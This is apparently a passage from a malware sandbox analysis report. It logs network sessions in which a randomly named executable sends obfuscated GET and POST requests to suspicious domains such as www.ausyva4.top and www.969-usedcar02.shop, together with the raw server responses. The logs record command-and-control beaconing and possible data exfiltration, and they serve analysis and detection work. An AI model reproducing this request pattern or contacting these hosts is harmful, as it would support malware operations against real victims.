                                                      Data Ascii: rPh=4DLMdNWNjQmP+fhTBASaiPxz7zWxevg3cS3DU7Waa7BAvMLEXB494mhcVz93tLVY0KqtlmwI14bS+qNSC1rAhRIhb7TncxuwRdjWuBbVHfjI7zrWOLm2bHHSZZKGKneGec74IMj3luE2WAdCgLTx2LtfClaAs8EiypYYxGTKwbl2ITiiQ2kFaSd5sf4F9cZEphBrDB22qz//cenv288maQgbiJeympd5inmMWobCufzBq05SRhAIVBF85CaUmKisAeY0xvaPtOMwd4TtBMJf81n+nuDK5lR4E95Ui3QGtUgK801DUpgXWYa0SH/839o9iB6hfPAklC+HBw7vKx7MuUy0SyrUNKdicPjv02X9ZAAbjKqq9XWg9e0lkA+vsqS4p2bIJ6XZA28LKyWgGySO0L1XEwIZVWwtU8gnV56zUVuca2GZZ6tJlaHaTaYzprRom+GNC7X28aQzANyfDZN+KQQs3SxZaQrBtBoNXBtryBv6ipWc4GAvV9FKmiqPJrXFHddJt7Zkjjc0sFJ3375mr3kpr2EcNenv7B4f1lNqOJbdrCQ8plzabVqqSoL8JK9vxbZ7oNKdl4Jbs4oq4FYoWo87gCKsd6xBHd5KMAfPYWYpGsCb3XZFHGOaxcGyPjZrnzqR5LnIQrBJEekbxLJHEa9+k5JTE13hhh/wQ5X51QRCOKyqTJkcMP5j7eTsivV/8GjlUHcxC/M04YnIOSIc2tEz9JKxbSfNof9CEvAVVM1/RJPCQUvbmtOv5ka76zOicmYNq9xfOpFZCiqW7L3YHPZRKLCWItN06pS5x4eSFsm59kW9zi2cE7HEuq7PiVuTCxsyJ6y7O9imtYoN9pVaU1vDEuNA3tdJu5NZeLPiPJqV7dINK1/pJsTRwq+vmKvL6cqZRtVhj2pnk1kMnznUgjk2i8rn0QXySAL8fIWV3Oktes2/NOLDLkMF6894ufdd6XoQ2op8XC/S4135l3WBFPsjk/t02amOfrApI10sgsM3ApFh [TRUNCATED]
                                                      Dec 17, 2024 08:24:34.405495882 CET815INHTTP/1.1 404 Not Found
                                                      Date: Tue, 17 Dec 2024 07:24:34 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hIelB46BcHRgkok219krv8Mumjfw%2FpHRb6DrileRgllu81rW9XmdL9fJFcW4%2FY5yVZyhBi8Q%2Bpi0gjkCY5xP0jrKriIkEEvEHxCuBsYcM3DFr2rPtQ98yaff3Uhju%2FcroS4%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8f352c98ff9a43f7-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1819&rtt_var=909&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1761&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                      Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                      Data Ascii: f
                                                      Dec 17, 2024 08:24:34.406332970 CET355INData Raw: 31 35 37 0d 0a 75 91 41 4b 03 31 10 85 ef 85 fe 87 d1 7b 3b dd 75 45 28 21 07 6d 45 a1 6a d1 15 f4 98 36 d3 26 98 66 4a 76 b6 cb fe 7b e9 da 95 22 78 c9 cb 64 e6 7b 4c 78 ea 62 f6 72 57 7e 2e e7 f0 50 3e 2d 60 f9 7e bb 78 bc 83 cb 11 e2 e3 bc bc
                                                      Data Ascii: 157uAK1{;uE(!mEj6&fJv{"xd{LxbrW~.P>-`~xGN> /pBdV%.&<=*yTj=PeipoRN 5EOqMcJe S$s+QU-Ro8n|N;##C]n3Z@]vuV.


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.849717104.21.48.233805164C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 17, 2024 08:24:36.121577978 CET464OUTGET /al74/?rPh=1Bjse4aauCmo97N7IjLs1t9/5DytV/tAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4otrEVDu/SUiQI/oGzb8PpnvlDT2bJ+R5Sn1ObiYbGTGLsy9HRXwDQ==&kVvpD=Bx4T HTTP/1.1
                                                      Host: www.ausyva4.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                      Dec 17, 2024 08:24:37.312887907 CET1236INHTTP/1.1 404 Not Found
                                                      Date: Tue, 17 Dec 2024 07:24:37 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WdxplgCoAyb9r%2BTdQqkLpyWc%2F85Qf1f6IcWe%2BHIEDONXFXQQIHeQYpn1an9GCeM%2BMwfMlrTZIFb2nkhkr3svcFWCbf1tNXWLbQh6ZybUyaNM4qlXx0pyKIGezLyMst9bQR0%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8f352cab1ed443f9-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2229&min_rtt=2229&rtt_var=1114&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=464&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                      Data Raw: 32 63 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f [TRUNCATED]
                                                      Data Ascii: 2c9<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://www.ausyva4.top/al74/?rPh=1Bjse4aauCmo97N7IjLs1t9/5DytV/tAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4otrEVDu/SUiQI/oGzb8Ppnvl
                                                      Dec 17, 2024 08:24:37.312948942 CET255INData Raw: 44 54 32 62 4a 2b 52 35 53 6e 31 4f 62 69 59 62 47 54 47 4c 73 79 39 48 52 58 77 44 51 3d 3d 26 61 6d 70 3b 6b 56 76 70 44 3d 42 78 34 54 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e
                                                      Data Ascii: DT2bJ+R5Sn1ObiYbGTGLsy9HRXwDQ==&amp;kVvpD=Bx4T</td></tr><tr><td>Server:</td><td>luodiye-aws-node1</td></tr><tr><td>Date:</td><td>2024/12/17 15:24:37</td></tr></table><hr/>Powered by X<hr><center>tengine</center></body>
                                                      Dec 17, 2024 08:24:37.313174963 CET5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.849719199.59.243.227805164C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 17, 2024 08:24:43.031739950 CET745OUTPOST /cfcv/ HTTP/1.1
                                                      Host: www.969-usedcar02.shop
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-us
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Content-Length: 204
                                                      Connection: close
                                                      Origin: http://www.969-usedcar02.shop
                                                      Referer: http://www.969-usedcar02.shop/cfcv/
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                      Data Raw: 72 50 68 3d 2f 48 72 38 65 44 6b 2f 37 4d 47 4d 46 68 6d 58 6e 7a 73 6e 45 57 6d 78 50 4e 49 36 77 66 43 34 45 6b 73 68 64 78 46 76 56 55 45 64 65 49 69 6c 6b 4f 64 59 6a 33 64 44 43 71 35 6a 38 52 70 7a 4c 5a 50 32 36 6e 4b 6d 66 62 62 69 43 61 43 4a 7a 6d 44 57 51 31 74 77 66 52 59 74 4f 61 38 57 6a 2f 71 2f 73 38 78 47 6e 4e 65 4a 4c 62 4b 59 62 61 4f 6b 52 47 56 6b 64 4e 48 73 30 53 47 70 39 6c 49 56 48 54 65 37 46 33 61 4e 75 46 2f 56 56 74 49 39 4e 34 69 46 42 33 2f 47 58 61 38 4d 79 57 64 6c 38 44 52 34 47 47 6e 47 38 44 64 6b 2b 6a 77 63 74 64 58 46 45 4b 44 4a 51 6b 6d 50 35 71 71 6a 50 39 6f 3d
                                                      Data Ascii: rPh=/Hr8eDk/7MGMFhmXnzsnEWmxPNI6wfC4EkshdxFvVUEdeIilkOdYj3dDCq5j8RpzLZP26nKmfbbiCaCJzmDWQ1twfRYtOa8Wj/q/s8xGnNeJLbKYbaOkRGVkdNHs0SGp9lIVHTe7F3aNuF/VVtI9N4iFB3/GXa8MyWdl8DR4GGnG8Ddk+jwctdXFEKDJQkmP5qqjP9o=
                                                      Dec 17, 2024 08:24:44.111365080 CET1236INHTTP/1.1 200 OK
                                                      date: Tue, 17 Dec 2024 07:24:43 GMT
                                                      content-type: text/html; charset=utf-8
                                                      content-length: 1138
                                                      x-request-id: 403c4ede-166e-4c4f-8de9-a3c17097ec66
                                                      cache-control: no-store, max-age=0
                                                      accept-ch: sec-ch-prefers-color-scheme
                                                      critical-ch: sec-ch-prefers-color-scheme
                                                      vary: sec-ch-prefers-color-scheme
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ==
                                                      set-cookie: parking_session=403c4ede-166e-4c4f-8de9-a3c17097ec66; expires=Tue, 17 Dec 2024 07:39:43 GMT; path=/
                                                      connection: close
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 39 69 67 35 35 45 33 6e 54 2b 2b 58 39 58 71 6b 7a 4e 47 53 48 32 6b 38 53 30 54 6f 48 64 67 36 71 4a 35 6f 54 38 6a 72 78 71 38 4e 65 32 65 2b 7a 68 6d 37 47 66 6a 44 70 72 59 52 6c 53 5a 78 36 32 73 45 50 74 77 67 6b 5a 79 2b 78 61 49 38 73 57 39 5a 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                      Dec 17, 2024 08:24:44.111434937 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDAzYzRlZGUtMTY2ZS00YzRmLThkZTktYTNjMTcwOTdlYzY2IiwicGFnZV90aW1lIjoxNzM0NDIwMj


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.849720199.59.243.227805164C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 17, 2024 08:24:45.730436087 CET765OUTPOST /cfcv/ HTTP/1.1
                                                      Host: www.969-usedcar02.shop
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-us
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Content-Length: 224
                                                      Connection: close
                                                      Origin: http://www.969-usedcar02.shop
                                                      Referer: http://www.969-usedcar02.shop/cfcv/
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                      Data Raw: 72 50 68 3d 2f 48 72 38 65 44 6b 2f 37 4d 47 4d 48 42 57 58 6c 51 30 6e 55 47 6d 32 44 74 49 36 36 2f 43 38 45 6b 77 68 64 77 41 71 57 6d 67 64 65 6f 53 6c 6a 50 64 59 69 33 64 44 4a 4b 35 6d 79 78 70 38 4c 5a 4c 45 36 6a 4b 6d 66 62 2f 69 43 66 2b 4a 7a 58 44 52 54 46 74 79 55 78 59 76 52 4b 38 57 6a 2f 71 2f 73 38 6c 38 6e 4e 6d 4a 4c 4c 61 59 59 37 4f 6e 59 6d 56 72 56 74 48 73 77 53 47 74 39 6c 49 37 48 53 79 46 46 30 69 4e 75 45 50 56 56 59 6f 38 44 49 69 66 5a 58 2b 77 53 35 4a 42 33 30 77 44 79 53 6c 6c 4a 33 2f 37 35 31 73 4f 6b 42 34 61 75 64 2f 75 45 4a 72 2f 56 54 37 6e 6a 4a 36 54 52 71 39 4f 75 6c 68 47 64 30 42 4a 63 39 63 4d 62 33 43 7a 4a 62 33 74
                                                      Data Ascii: rPh=/Hr8eDk/7MGMHBWXlQ0nUGm2DtI66/C8EkwhdwAqWmgdeoSljPdYi3dDJK5myxp8LZLE6jKmfb/iCf+JzXDRTFtyUxYvRK8Wj/q/s8l8nNmJLLaYY7OnYmVrVtHswSGt9lI7HSyFF0iNuEPVVYo8DIifZX+wS5JB30wDySllJ3/751sOkB4aud/uEJr/VT7njJ6TRq9OulhGd0BJc9cMb3CzJb3t
                                                      Dec 17, 2024 08:24:46.802655935 CET1236INHTTP/1.1 200 OK
                                                      date: Tue, 17 Dec 2024 07:24:46 GMT
                                                      content-type: text/html; charset=utf-8
                                                      content-length: 1138
                                                      x-request-id: c427f7b8-cad8-4032-a7df-b1365a50d31a
                                                      cache-control: no-store, max-age=0
                                                      accept-ch: sec-ch-prefers-color-scheme
                                                      critical-ch: sec-ch-prefers-color-scheme
                                                      vary: sec-ch-prefers-color-scheme
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ==
                                                      set-cookie: parking_session=c427f7b8-cad8-4032-a7df-b1365a50d31a; expires=Tue, 17 Dec 2024 07:39:46 GMT; path=/
                                                      connection: close
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 39 69 67 35 35 45 33 6e 54 2b 2b 58 39 58 71 6b 7a 4e 47 53 48 32 6b 38 53 30 54 6f 48 64 67 36 71 4a 35 6f 54 38 6a 72 78 71 38 4e 65 32 65 2b 7a 68 6d 37 47 66 6a 44 70 72 59 52 6c 53 5a 78 36 32 73 45 50 74 77 67 6b 5a 79 2b 78 61 49 38 73 57 39 5a 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                      Dec 17, 2024 08:24:46.802707911 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzQyN2Y3YjgtY2FkOC00MDMyLWE3ZGYtYjEzNjVhNTBkMzFhIiwicGFnZV90aW1lIjoxNzM0NDIwMj


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.849721199.59.243.227805164C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 17, 2024 08:24:48.402513981 CET1782OUTPOST /cfcv/ HTTP/1.1
                                                      Host: www.969-usedcar02.shop
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-us
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1240
                                                      Connection: close
                                                      Origin: http://www.969-usedcar02.shop
                                                      Referer: http://www.969-usedcar02.shop/cfcv/
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                      Data Raw: 72 50 68 3d 2f 48 72 38 65 44 6b 2f 37 4d 47 4d 48 42 57 58 6c 51 30 6e 55 47 6d 32 44 74 49 36 36 2f 43 38 45 6b 77 68 64 77 41 71 57 6d 6f 64 65 5a 79 6c 6c 73 31 59 68 33 64 44 45 71 35 6e 79 78 70 62 4c 66 6a 41 36 6a 4f 51 66 64 37 69 44 35 71 4a 31 6c 6e 52 45 31 74 79 4a 68 59 71 4f 61 39 65 6a 37 48 32 73 38 31 38 6e 4e 6d 4a 4c 4f 65 59 50 36 4f 6e 65 6d 56 6b 64 4e 48 61 30 53 47 56 39 6c 77 4e 48 53 48 77 46 45 43 4e 70 6b 66 56 53 38 49 38 46 59 69 5a 61 58 2b 34 53 35 55 42 33 30 74 36 79 53 52 66 4a 77 54 37 34 41 4e 4f 33 6c 6b 6d 73 65 32 61 43 70 44 2b 51 68 58 34 39 6f 79 77 5a 4c 55 76 73 56 78 4b 52 53 46 42 55 76 46 48 43 68 32 42 45 76 69 2f 2b 74 66 54 5a 79 67 79 61 43 38 36 4f 57 52 62 50 4b 32 78 7a 32 42 64 51 77 61 42 4f 2f 6c 77 59 74 43 7a 58 30 76 57 4c 7a 65 48 76 62 67 65 50 47 54 55 33 2b 39 41 5a 4e 65 37 54 43 6a 4f 6e 57 50 62 46 47 2b 77 57 62 69 77 4b 61 44 45 35 35 68 71 6e 44 6b 75 65 54 2f 77 6c 43 72 35 4e 57 41 64 46 74 75 4b 7a 6c 4c 70 7a 6c 78 59 4b 37 [TRUNCATED]
                                                      Data Ascii: rPh=/Hr8eDk/7MGMHBWXlQ0nUGm2DtI66/C8EkwhdwAqWmodeZylls1Yh3dDEq5nyxpbLfjA6jOQfd7iD5qJ1lnRE1tyJhYqOa9ej7H2s818nNmJLOeYP6OnemVkdNHa0SGV9lwNHSHwFECNpkfVS8I8FYiZaX+4S5UB30t6ySRfJwT74ANO3lkmse2aCpD+QhX49oywZLUvsVxKRSFBUvFHCh2BEvi/+tfTZygyaC86OWRbPK2xz2BdQwaBO/lwYtCzX0vWLzeHvbgePGTU3+9AZNe7TCjOnWPbFG+wWbiwKaDE55hqnDkueT/wlCr5NWAdFtuKzlLpzlxYK7UN/ULZecSRb4omGblLwpyQzGrz/u+sPH9pKOX1jZj7eNSpPpPoG2xeadH3iaTFGPMzyBVJBw5Pt+5+ePykGxZNNPJVr7i0WvtCRu1sYKFhTFUhgL6TB8skqI071rLlc+DxTIuoTALLVstoddw6y07wvLxwSMfRRmS4pu+BQBntcHxHeBVMBY0y5slXQlkkcmBoJ86FYxgDJn+kGw4LpUXGxOB2MpGiE3KMGRxVBNOUq6cudL+fihxP+mP34bbAEUbfgajLBEWmY02bke/6AcQSajGSAXIqZASseMKmBkIdjH9QSy4J21WGiG5vHFnN2K100nU9ypqiVJtONHnh1oQeINY59I6ba+X4Q5XyAWKH52/KLgLpMfLYRB+sQ1s7kKV9mjlERNjeZV1PG2aJmt72GsbGg3idY/aZcNtUThH6qc6NTlLJD0wVAxa0bJAUgPCluIdHWdcxU9dxGKGSoii9hDlD4pzdH0f7dFXvaPkx4eHuIKMDWEP0gcf+Q/RKL9mJXChBPLPxF5mhBFUX142Q3z4uMNb90QF/9MPS9e4w8TqFtvsMnwojv4vFDJxGjBtE5nvtRzwzeQECxjKNOGy0euksUuY/S4so0ZDx3AgAKU4t04XTtNFPVKKxqM7Vx8qWEWR0B4QkKVEZIwIC3MFkgvPYpIPbTQqS [TRUNCATED]
                                                      Dec 17, 2024 08:24:49.495121956 CET1236INHTTP/1.1 200 OK
                                                      date: Tue, 17 Dec 2024 07:24:49 GMT
                                                      content-type: text/html; charset=utf-8
                                                      content-length: 1138
                                                      x-request-id: d0f5d0e2-0973-457d-ad94-e71c6ed60152
                                                      cache-control: no-store, max-age=0
                                                      accept-ch: sec-ch-prefers-color-scheme
                                                      critical-ch: sec-ch-prefers-color-scheme
                                                      vary: sec-ch-prefers-color-scheme
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ==
                                                      set-cookie: parking_session=d0f5d0e2-0973-457d-ad94-e71c6ed60152; expires=Tue, 17 Dec 2024 07:39:49 GMT; path=/
                                                      connection: close
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 39 69 67 35 35 45 33 6e 54 2b 2b 58 39 58 71 6b 7a 4e 47 53 48 32 6b 38 53 30 54 6f 48 64 67 36 71 4a 35 6f 54 38 6a 72 78 71 38 4e 65 32 65 2b 7a 68 6d 37 47 66 6a 44 70 72 59 52 6c 53 5a 78 36 32 73 45 50 74 77 67 6b 5a 79 2b 78 61 49 38 73 57 39 5a 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
